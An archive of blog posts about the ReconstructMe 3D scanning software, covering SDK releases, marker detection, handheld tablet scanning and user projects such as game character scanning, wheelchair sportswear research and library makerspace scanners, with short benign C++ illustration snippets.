Author Archives: Christoph Heindl

About Christoph Heindl

I'm a professional software engineer working for PROFACTOR GmbH in Austria/Europe, the initiator of ReconstructMe and one of its main contributors. Reach me on LinkedIn.

ReconstructMe 2.2.940 Released

Today we are happy to announce a new release of the ReconstructMe UI and the ReconstructMe SDK. The new UI adds 64-bit support and can save OBJ files with texture, as outlined in our previous post. We've also made the surface scaling in Selfie 3D mode optional. The SDK release brings a couple of bug fixes for the 64-bit build and better tuned texturing parameters.

Head over to the downloads section to grab ReconstructMe.

ReconstructMe SDK with UV Texture and 64-bit Support

Today we are happy to release an update for the ReconstructMe SDK. Over the past couple of months we have worked hard on adding the two most requested features: the SDK can now export UV texture maps, and it is available as a 64-bit build.

UV Texture Mapping

Previously, ReconstructMe was not able to export colorized meshes in the .OBJ file format, because this format does not support vertex colors. We have now adapted our pipeline to automatically convert vertex colors to a UV texture map when exporting as OBJ.
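To make the distinction concrete, here is a minimal sketch (our own illustration, not ReconstructMe code) of how a textured mesh is laid out in OBJ: vertex positions carry no color, texture coordinates map each vertex into a texture image, and a companion MTL file points at that image. File names and geometry are made up.

```cpp
// Sketch: writing a textured quad as OBJ + MTL. Illustrative values only.
#include <fstream>

int main() {
    // The material file points the OBJ at a texture image.
    std::ofstream mtl("scan.mtl");
    mtl << "newmtl scan_material\n"
           "map_Kd scan_texture.png\n";   // diffuse texture holding the colors

    std::ofstream obj("scan.obj");
    obj << "mtllib scan.mtl\n"
           "usemtl scan_material\n";
    // Vertex positions (v) carry no color; color comes from the texture.
    obj << "v 0 0 0\nv 1 0 0\nv 1 1 0\nv 0 1 0\n";
    // Texture coordinates (vt) map each vertex into the 2D texture image.
    obj << "vt 0 0\nvt 1 0\nvt 1 1\nvt 0 1\n";
    // Faces reference position/texture-coordinate indices as v/vt.
    obj << "f 1/1 2/2 3/3 4/4\n";
    return 0;
}
```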

As simple as this may sound, it is not a trivial conversion and requires some hard thinking to get right. The steps involved include unfolding complex three-dimensional shapes onto a 2D disc in such a way that minimal visual distortion appears, plus rearranging the individual portions of the unfolded structure so that empty space in the texture is avoided.

On the left side of the image above you can see a final textured mesh. The green lines indicate the texture seams, i.e. the cuts that were made virtually to unfold the mesh into a disc-like structure. On the right side the texture map is displayed.

We consider this feature to be in beta, so when you use it, expect some glitches such as increased computation time and visual artefacts along texture seams.

64-bit Support

As promised, from now on we release 32-bit and 64-bit versions of our SDK side by side. You should consider switching to the 64-bit version when processing huge models with a large memory footprint: the 64-bit build allows the SDK to address more memory and complete processing in such cases.

You can download the updated SDK here.

ReconstructMe Handheld Scanning

Right before the holiday season in Austria kicks off, we wanted to share with you one of our latest developments, called ReconstructMe Mobile Scanning. It is all about turning ReconstructMe into a handheld scanning device, removing long USB cables and giving you the freedom to scan without limitations.

In the video below you can see me scanning a bust using a Windows tablet connected to an ASUS Xtion Pro Live via a custom 3D-printed mount.



We needed to adapt ReconstructMe so that you can scan using low-powered mobile devices such as tablets. The approach we took is illustrated below.

The required hardware consists of a desktop PC or notebook running in the background and a lightweight tablet connected to a 3D sensor. The actual reconstruction is performed on the PC in the background. This workhorse receives compressed 3D data from the tablet via WiFi and computes a 3D model in real time. The current state of the reconstruction is sent back to the tablet for visualization. An additional communication channel is used for transmitting commands from user interaction. This setup allows us to scan at 30 frames per second.
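Streaming at that rate only works because depth frames compress well. The sketch below (our own illustration with a synthetic frame, not the actual ReconstructMe code or protocol) shows the idea on the tablet side: pack one 640x480 16-bit depth image with zlib before it would be pushed over the WiFi link.

```cpp
// Sketch: compress one synthetic 640x480 16-bit depth frame with zlib,
// as a stand-in for the packets the tablet would send to the PC.
#include <cstdint>
#include <cstdio>
#include <vector>
#include <zlib.h>

int main() {
    const int w = 640, h = 480;
    std::vector<uint16_t> depth(w * h);
    for (int i = 0; i < w * h; ++i)
        depth[i] = static_cast<uint16_t>(800 + (i % 64));  // fake depth in mm

    const uLong srcLen = static_cast<uLong>(depth.size() * sizeof(uint16_t));
    uLongf dstLen = compressBound(srcLen);
    std::vector<Bytef> packet(dstLen);

    // Depth images compress well because neighboring pixels are similar.
    compress(packet.data(), &dstLen,
             reinterpret_cast<const Bytef*>(depth.data()), srcLen);

    std::printf("raw: %lu bytes, compressed: %lu bytes (%.1fx smaller)\n",
                static_cast<unsigned long>(srcLen),
                static_cast<unsigned long>(dstLen),
                static_cast<double>(srcLen) / dstLen);
    // In the real setup, such a packet would be sent over a TCP/WiFi socket
    // to the background PC roughly 30 times per second.
    return 0;
}
```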

In case you are interested in a close-up of the sensor mounted to the tablet, here is a short clip.



Holiday season

Please note that our shop will be closed from the 22nd of December until the 5th of January 2015. The ReconstructMe team wishes all users and friends happy holidays! We are looking forward to seeing you next year.

ReconstructMe SDK 2.2 Released

Today, we are releasing version 2.2 of the ReconstructMe SDK, which brings marker detection support.

Marker detection

A marker, like the one on the right, is a special object placed in the view of the camera that has a couple of useful properties: from a software point of view it is easily detectable, it allows estimating the camera pose with respect to the marker frame, and it does not require dense 3D data.

With markers you can

  • Define a canonical world coordinate system The marker defines the position and orientation of the world coordinate system. It is designed in such a way that if laid on the floor, the z-axis of the world frame points towards the ceiling.
  • Automatically remove stands and floor data By letting the world volume start a bit above the marker coordinate system, you can cut away floor and turntable data (see the sketch after this list).
  • Improve tracking Although not used by us, you could use the marker frame to perform camera tracking.
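As a rough illustration of the second point, the sketch below (our own example, not SDK code) composes a volume pose from a marker pose: the volume is lifted a few millimeters along the marker's z-axis so that the floor plane falls outside the reconstruction volume. The matrix layout and the offset value are assumptions chosen for the demo.

```cpp
// Sketch: place the reconstruction volume slightly above a detected marker.
// Plain row-major 4x4 homogeneous transforms; values are illustrative only.
#include <array>
#include <cstdio>

using Mat4 = std::array<double, 16>;  // row-major

Mat4 multiply(const Mat4& a, const Mat4& b) {
    Mat4 r{};
    for (int i = 0; i < 4; ++i)
        for (int j = 0; j < 4; ++j)
            for (int k = 0; k < 4; ++k)
                r[i * 4 + j] += a[i * 4 + k] * b[k * 4 + j];
    return r;
}

int main() {
    // Pose of the marker in sensor/world coordinates (identity for the demo).
    Mat4 marker_pose = {1, 0, 0, 0,
                        0, 1, 0, 0,
                        0, 0, 1, 0,
                        0, 0, 0, 1};

    // Lift the volume 5 mm along the marker's z-axis (which points towards
    // the ceiling when the marker lies on the floor), so floor and turntable
    // data fall outside the reconstruction volume.
    Mat4 lift = {1, 0, 0, 0,
                 0, 1, 0, 0,
                 0, 0, 1, 5.0,
                 0, 0, 0, 1};

    Mat4 volume_pose = multiply(marker_pose, lift);
    std::printf("volume origin lifted by %.1f mm above the marker\n",
                volume_pose[2 * 4 + 3]);
    return 0;
}
```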

A new turntable scanner example was added to the list of examples; it explains how to use marker detection in your application.

Download is available from the developer page.

Other Changes

Besides marker support, you might notice a couple of other changes when browsing the SDK docs. For one, we have added 64-bit builds, and a network sensor was added to the feature list. We will have more info on both in the coming weeks.

Kinect v2

A short note for all Kinect v2 users. We still do not support the Kinect v2, not because integrating the camera is hard, but because of the effects we see in the 3D depth data the camera delivers. We currently observe strong deformations of planar surfaces, which we attribute to the time-of-flight measuring principle used in the new Kinect v2. These deformations currently make precise scanning impossible.

ReconstructMe used in This War of Mine

by Dominik Zieliński | Lead Artist of This War of Mine – 11 bit studios

This War of Mine (TWoM) is a game explicitly different from your everyday product. It has no flashy muscled characters, no science-fiction robots, and no mind-dazzling eye candy. TWoM tells a down-to-earth, straightforward story rooted in the brutal reality of life in a conflict zone. TWoM's message is: “This war can happen to you”.



This is why we needed characters that felt believable. We turned to scanning because we wanted to capture that ordinary, everyday-person feel. I think the fact that all the characters we meet in TWoM are scanned from real people adds a certain layer of depth to the entire game experience.

In the beginning, right before we started considering scanning characters, ReconstructMe added color scanning functionality, which made the decision to actually go with scanning a no-brainer.

For our scans we used a Kinect, a rotating platform (and some duct tape), and the results we got were perfect for what we needed.
I especially liked the cloth wrinkles, which would require some time to simulate, or even more time to sculpt, and the effect probably wouldn't be as good. That was a big plus because the characters in TWoM are mostly fully clothed. ReconstructMe contributed greatly to the characters' overall quality.

Scanning heads is great. Percentage-wise, while working on TWoM, the most time was saved by scanning real people's heads instead of sculpting them in 3D.

When we were in the midst of the development process, the selfie functionality was added, and with it came the automatic capping of holes in unscanned areas. That was a big help: it sliced off a large portion of the development pipeline and saved us artists some time.

In the end we made more than 200 scans of torsos, legs and heads. We scanned so much that during our last scanning session the custom-made rotating platform we used broke down.

A simple turntable scanner with ReconstructMe

We thought it was about time to inform you about some upcoming features of the new ReconstructMe SDK release. We've changed quite a bit, and in this post we want to introduce the new marker detection feature.

A marker, like the one on the right, is a special object placed in the view of the camera that has a couple of useful properties: from a software point of view it is easily detectable, it allows estimating the camera pose with respect to the marker frame, and it does not require dense 3D data.

Great, but why would I need marker detection in ReconstructMe? There are multiple reasons, but the most striking one for us was usability. We think markers are a great way of interactively defining the reconstruction space. How often did you restart a scan just because you had badly positioned the camera? It probably happens quite often, even to us!

With marker detection this changes. Simply place the marker in the scene where you would like the reconstruction volume to be. Make sure the camera sees the marker and start scanning. The reconstruction volume will line up with the real-world marker position.

That’s not all. You additionally get the following features for free

  • A canonical world coordinate system The marker defines the position and orientation of the world coordinate system. It is designed in such a way that if laid on the floor, the z-axis of the world frame points towards the ceiling.
  • Automatic removal of stands and floor data By letting the world volume start a bit above the marker coordinate system you can cut away floor and turntable data.
  • Improve tracking Although not used by us, you could use the marker frame to perform camera tracking.

Not yet convinced? Take a look at the following video of a turntable based scanner.


What the video doesn’t tell you: once the scanning starts you are free to move the camera around as you would usually do with ReconstructMe.

Sportswear for Wheelchair Athletes

by Anke Klepser

Hi everyone,

The Hohenstein research team for clothing technology has worked with 3D scanner systems since 1999. The aim is to take body measurements and geometrical data to provide important information for garment construction, product development and optimization.

One of our recent projects concerned sportswear for wheelchair athletes. Garments should be constructed for this specific target group. Therefore, the focus was to analyze the change of dimensions and geometry due to the specific sports movements and positions. We used a Kinect sensor and the ReconstructMe software to capture handcycling athletes in their sports wheelchairs. The system gave many advantages over stationary 3D body scanners: we were able to scan people during training times at different places and to capture athletes in their handcycles.

We captured the athletes in two shots and merged the files as shown below.

Merging of 3D scan files

One result was that, due to the specific posture in the handcycle, athletes have a differing neck position (see image below). Therefore, the collars of sports shirts should be constructed differently to prevent discomfort for the customer.

Differing neck position due to different posture in handcycle

With the results of the research project, companies are able to produce adapted sportswear fulfilling the special requirements of wheelchair athletes.

All images courtesy of the Hohenstein Institute. If you have any questions please contact me at a.klepser@hohenstein.de.

Structure.io sensor in ReconstructMe

The company Occipital has recently released their Structure sensor. We ordered one early this year and received it yesterday. Now we’d like to show you how you can use it together with ReconstructMe.

The Structure sensor is based on a PrimeSense Carmine/Capri 1.08 depth sensor and comes without an additional RGB camera module. Since it is PrimeSense-based technology, the Structure sensor can simply be accessed via OpenNI, a framework developed by PrimeSense.

Setup

In order to use the sensor with ReconstructMe on Windows, you should order one including the Hacker cable, which allows you to connect the sensor to a standard USB port on your Windows machine. The sensor package comes with a USB Hacker cable, an iPad connector cable and a power supply to charge the built-in battery. For ReconstructMe, only the following parts are needed to get it running.

Note that we didn’t need to charge its internal battery which we assume is only needed for iPad uses where additional power is needed to keep the sensor running.

To get the sensor recognized in Windows you need to install OpenNI. Connect the sensor via the USB Hacker cable to a USB port on your PC. Your sensor should be recognized in the device manager as PrimeSense.
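If you want to double-check programmatically that the driver sees the sensor, a quick device listing with the OpenNI 2 C++ API looks roughly like the sketch below (this assumes OpenNI 2 is installed and is not part of ReconstructMe itself).

```cpp
// Sketch: list the depth devices OpenNI 2 can see, to confirm the Structure
// sensor is recognized before starting ReconstructMe.
#include <cstdio>
#include <OpenNI.h>

int main() {
    if (openni::OpenNI::initialize() != openni::STATUS_OK) {
        std::printf("OpenNI init failed: %s\n",
                    openni::OpenNI::getExtendedError());
        return 1;
    }

    openni::Array<openni::DeviceInfo> devices;
    openni::OpenNI::enumerateDevices(&devices);

    for (int i = 0; i < devices.getSize(); ++i)
        std::printf("device %d: %s %s (%s)\n", i,
                    devices[i].getVendor(), devices[i].getName(),
                    devices[i].getUri());

    openni::OpenNI::shutdown();
    return 0;
}
```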

Next, start ReconstructMe. Once started, ReconstructMe will detect your sensor and you are (almost) ready to go. As with every sensor, it makes sense to calibrate it in order to get the best reconstruction results. Luckily, we've already done this for you and provide a specific Structure sensor configuration file. To apply the configuration, navigate to Device / Sensor Selection, uncheck Automatically detect sensor and browse to the sensor configuration file.

ReconstructMe will re-open your sensor and now you are all set for scanning.

Results

In our tests the Structure turned out to be a decent depth sensor on par with a Carmine 1.08. Below is a video showing a quick self scan.

Enjoy scanning.

MiniMe3d is born thanks to ReconstructMe

by Corey Wormack

Every year our home has three young athletes who are awarded standard trophies at the end of each season. With the advances in technology, we thought maybe 3D scanning and printing could offer a more personalized, memorable solution, but what type of system should we use? To the internet! After a lot of research, trial and error, and with the timely release of ReconstructMe version 2, we decided to build our solution around their software.

The new version allows us to 3D scan a person in color, adding a new level of realism and allowing the final product to really stand out! After many hours and several outfit changes for the whole family, we developed a pretty efficient workflow and were ready for prime time! Our first chance to apply what we had learned in public was at a very large regional volleyball tournament.

We arrived the night before the tournament and tested our system under the large convention center lighting. Yeah – it worked! We were now ready for the hordes of sports fans to purchase our amazing piece of memorabilia. What we had not realized was that it would take customers a little while to warm up to the idea that they could have a “minime” of themselves through 3D scanning. Comments ranged from “cool” to “creepy” with everything in between, but by the end of the show we had sales.

So how did we configure our system? We had a laptop with an NVIDIA Quadro 3000M video card, an ASUS Xtion Pro Live sensor, a modified manual turntable based on Fredini's design, and a tripod.

Why were we successful? The ReconstructMe UI allowed people to see the process in real time as it quickly displayed the scan data. The fluorescent lighting only required some quick post-processing cleanup of our captures. The final products were then sent to Sculpteo for color printing.

Where do we go from here? We look forward to the next version of ReconstructMe, which allows the user to create great print-ready 3D busts like the 180 displayed on the ReconstructMe website. This will simplify our workflow and give us consistent results.

Babe – The 3D Iguana

by Erich Purpur

The DeLaMare Science & Engineering Library at the University of Nevada, Reno has undergone some drastic changes in the past few years and has become heavily used both as a place to study and as a makerspace. The notion of academic libraries incorporating makerspaces, which include collaborative learning spaces, cutting-edge technology, and knowledgeable staff, has seen more interest recently, and the DeLaMare Library has proven to be a popular and engaging model for the campus community.

Scan-O-Tron 3000

Let's flash back to December 2013, when Dr. Tod Colegrove, Head of the DeLaMare Library, presented the latest edition of Make Magazine to me. Inside was an article written by Fred Kahl, who had built himself a large-scale 3D scanning tower and turntable for the purpose of scanning large objects using ReconstructMe. Fred then took these 3D models and brought them to reality with his 3D printer. The DeLaMare Library had all the DIY capabilities to do the same, and the process of building the scanning station commenced.

In 2012, Mary Ann Prall, a resident of San Diego, CA, lost her friend Babe, an iguana who died at the age of 21 and has been frozen since. Mary Ann was looking to preserve her friend in a new format and came to us in hopes of printing Babe in 3D. At the time we only had a small handheld scanner, and with the help of our exceptional student employee, Crystal, we scanned Babe in sections and stitched them together using CAD programs.

Mary Ann, myself, and Crystal with Babe.

We invited Mary Ann and Babe back in April 2014, once we had completed the DIY 3D scanning tower. After mounting an Xbox Kinect sensor on the scanning tower, we purchased a single-use version of ReconstructMe and used it to scan Babe, creating an accurate graphical representation. After taking several scans and playing with different variables, the results turned out great!

Me scanning Babe using ReconstructMe software. Crystal and Mary Ann watching.

Mary Ann happened to visit on a Friday, a popular day on campus for visiting prospective students. During the process many newcomers came in and we had the opportunity to spark interest in the visitors as well as many current University of Nevada students who happened to walk by.

Some UNR students admiring Babe.

We have not yet printed Babe but will in the near future. Last time around, Mary Ann had Babe printed as a small model but this time around we intend to print a much larger model.

ReconstructMe and Multicopters (Part 2)

Since my last heads-up about my project on a quadcopter for fully autonomous indoor 3D reconstruction, I have implemented a simple takeoff and landing routine as a first step toward fully autonomous navigation. To achieve a smooth start of the motors, the autonomous takeoff routine starts with a set point 4 meters below ground and rises up to the actual scanning height. Landing follows the opposite approach, with an additional hold at 20 centimeters height to avoid a crash landing.

By adding a first simple trajectory that consists of the takeoff routine, followed by an arc around a point (the center of the object you want to scan) and the landing routine, the quadcopter can now already reconstruct simple objects.
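Generating the set points for such an arc is straightforward. The following sketch (my own illustration; radius, height and step count are made-up values) computes waypoints on a circular arc around the object center, each with a heading that points back at the center.

```cpp
// Sketch: set points on an arc around an object, with the heading (yaw)
// always pointing at the object center. Values are illustrative only.
#include <cmath>
#include <cstdio>

int main() {
    const double kPi = 3.14159265358979323846;
    const double cx = 0.0, cy = 0.0;   // object center (m)
    const double radius = 1.5;         // arc radius (m)
    const double height = 1.2;         // scanning height (m)
    const int    steps  = 12;          // waypoints along a 180 degree arc

    for (int i = 0; i <= steps; ++i) {
        double angle = kPi * i / steps;             // 0..180 degrees
        double x = cx + radius * std::cos(angle);
        double y = cy + radius * std::sin(angle);
        // Heading that keeps the sensor pointed at the object center.
        double yaw = std::atan2(cy - y, cx - x);
        std::printf("waypoint %2d: x=%.2f y=%.2f z=%.2f yaw=%.1f deg\n",
                    i, x, y, height, yaw * 180.0 / kPi);
    }
    return 0;
}
```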

Trajectory tracking deviation. Dashed lines are the set points, and the solid lines are the actual coordinates.

By plotting the same data in 3D the trajectory becomes visible.

Trajectory deviation plotted in 3D

The arc-shaped set point trajectory and the actual trajectory are clearly visible. The magenta colored lines show the heading at several intermediate points (they should point to the center of the arc). As a benefit, the ReconstructMe SDK outputs the full reconstruction of the chair used for tracking.

Reconstructed chair used for tracking.

I also made a video of such an experimental run, so you can see the fully autonomous quadcopter for indoor 3D reconstruction in action.

A 3D scanner for Hunt Library (Part 2)

by William Galliher

Hello everyone! We are the 3D Body Scanner team at North Carolina State University, and we are here with another blog update to show two important things. Pictures and progress! That’s right, we have a mid-project update for you all and a bunch of pictures of the team, our work, and where our project will be once we have completed it. The sponsor for our project, and the eventual home for our booth, is the Makerspace team at the James B. Hunt Jr. Library.

The Hunt Library is a showcase for engineering and technology, boasting large, open spaces made possible by the bookBot system that houses all of the books in underground storage. The Makerspace within the library hosts multiple 3D printers and is dedicated to educating the patrons of the library in 3D technology. In comes our team. We told you about our purpose, to make 3D scanning fun and educational, in our last post.

Here are three members of our four person team.

From left to right: Dennis Penn, William Galliher, Austin Carpenter

The three of us are standing in our prototype scanning booth, which can rotate around the user. The other member of the team is below, getting scanned using the alpha prototype of our software and station.

Jonathan Gregory, standing in the station

But don’t worry, not only do we have pictures of our team and the library, we also have progress. Our prototype station was able to successfully scan Jonathan, and the output mesh is below.

The scan of Jonathan Gregory

Pretty good for our alpha demo. We even managed to successfully scan the chancellor of our school, Chancellor Randy Woodson. Not only did we get a successful scan of our chancellor, we also got a small figure printed out!

The 3D print of Chancellor Randy Woodson

So that concludes this mid-project blog post. You got to meet the team and even got a sample of what we are able to do so far. We cannot wait to finish this project and be ready for our Design Day near the end of April. We will be back then with a final post on our project. Thank you for reading!

All images courtesy of William Galliher and http://lib.ncsu.edu/huntlibrary

Idea Contest – Win a 3D Printer!

Hello everyone!

We are proud to announce the first ReconstructMe idea contest, where your idea can win a 3D printer and other great prizes. To participate, all you need to have is a good idea. We’ve put together a short document describing the contest, the evaluation criteria and other things you need to know to get started.

Please note that the closing date has been extended from the 15th of June 2014 to the 19th of June 2014. In case your submission contains larger files, please upload them to a third-party service and link to the material.

Looking forward to seeing your submission!

A 3D scanner for Hunt Library (Part 1)

by William Galliher

Hello everyone, we are the 3D Scanner team from North Carolina State University! For our senior design project, we are constructing a full-body 3D scanning station for the Hunt public library here on campus. Hunt Library has a technology showcase and a Makerspace with 3D printers, and they are dedicated to showing what this technology can do. Unfortunately, many people who come into the library do not know what this technology is capable of, and many printers take quite a while to print.

To solve this problem, and show off what can be done with the technology in this field, our team has decided to construct a 3D scanner that will scan a patron in less than two minutes. The booth will show the scan as it takes place and export it as an STL file, which can be printed in the Makerspace within the library.

As part of the planning stage for this project, we spent time evaluating hardware and software alternatives. In doing so, we came across the video for ReconstructMe 2.0, which showed two sensors doing a fast, real-time scan of someone spinning around in a chair. At that point in time, our design involved moving a sensor up and down to capture multiple levels of a scan. Multiple sensors along with the fast record time would allow us to move our original goal of a scan within five minutes down to below two, and so we decided to go with ReconstructMe.

The video that made the decision on ReconstructMe

We are in the midst of constructing our station now, and recently completed multiple-sensor support and file export. We have alpha and beta demos rapidly approaching, in addition to a final design day in late April. We will be back soon after that to show our final product. Thanks for reading, and see you again soon!

All images courtesy of http://lib.ncsu.edu/huntlibrary

ReconstructMe 2.1 introduces Selfie 3D

We are thrilled to announce that today's ReconstructMe release includes Selfie 3D, a feature that allows you to capture 3D-printable self-portraits. We developed Selfie 3D to simplify the process of generating 3D-printable busts of yourself and your friends, just like the one below.

The current Selfie 3D feature is best used for generating head-to-shoulder busts. To use it, simply activate Selfie 3D and turn in front of your camera. The tutorial covers the basic steps and has some invaluable tips and tricks for creating the best possible busts. So don’t miss it!

Is the output directly printable?

Yes! Post-processing is fully automatic. We've put a lot of effort into the automatic post-processing of your scan. Here's what happens behind the scenes.

Making it watertight
Watertight refers to a property of 3D meshes that allows the 3D printer to determine the inside and outside of the mesh. A mesh without holes is often referred to as watertight, because if you filled the inside with water, none would leak out. ReconstructMe enforces this property.
Creating a planar stand
ReconstructMe slices the model at the bottom to generate a nice planar stand for your bust, so that it does not fall over when put down.
Fixing the orientation
ReconstructMe places the origin of the model at the center of the base of the bust, with the positive z-direction pointing upwards towards the head. This allows you to directly import the bust into your favorite 3D printer application or printing service, and your bust should already be placed on the printer's virtual platform.
Scaling it down
Since your 3D printer won't be able to print you in full size, ReconstructMe scales your model down to 20 cm when saving. Note that the saved model dimensions are in millimeters (see the sketch below).
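As a rough illustration of the last two steps (our own sketch, not the actual ReconstructMe code), the following snippet scales a set of vertices so the bust becomes 200 mm tall and moves the origin to the center of its base, with +z pointing towards the head.

```cpp
// Sketch: scale a mesh to a 200 mm tall bust and put the origin at the
// center of its base (z = 0, +z up). Vertex values are illustrative only.
#include <algorithm>
#include <cstdio>
#include <vector>

struct Vec3 { double x, y, z; };

int main() {
    // A stand-in for the scanned vertices, in millimeters.
    std::vector<Vec3> verts = {{-150, -100, 0}, {150, 100, 600}, {0, 0, 300}};

    // Bounding box of the scan.
    Vec3 lo = verts[0], hi = verts[0];
    for (const Vec3& v : verts) {
        lo.x = std::min(lo.x, v.x); hi.x = std::max(hi.x, v.x);
        lo.y = std::min(lo.y, v.y); hi.y = std::max(hi.y, v.y);
        lo.z = std::min(lo.z, v.z); hi.z = std::max(hi.z, v.z);
    }

    // Uniform scale so the height (z extent) becomes 200 mm.
    const double target_height = 200.0;
    const double s = target_height / (hi.z - lo.z);

    // Shift the base center to the origin, then apply the scale.
    const double cx = 0.5 * (lo.x + hi.x), cy = 0.5 * (lo.y + hi.y);
    for (Vec3& v : verts) {
        v.x = (v.x - cx) * s;
        v.y = (v.y - cy) * s;
        v.z = (v.z - lo.z) * s;   // base at z = 0, +z towards the head
    }

    std::printf("first vertex after post-processing: %.1f %.1f %.1f\n",
                verts[0].x, verts[0].y, verts[0].z);
    return 0;
}
```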

Need even more info? Make sure to check out our blog post about ReconstructMe SDK 2.1 and stay tuned for further blog posts covering this feature.

How long does post-processing take?

Usually, post-processing takes between 15 and 25 seconds. The time increases on a low-powered machine or when you don't have a ReconstructMe license. We used the Selfie 3D feature during the Long Night of Research, where we gathered over 150 scans in 3 hours. To view all scanned models, click the image below.

Amazing, isn’t it? Tell us about your favorite scan! And don’t forget to download.

Download 2.1.348 for Vista/7/8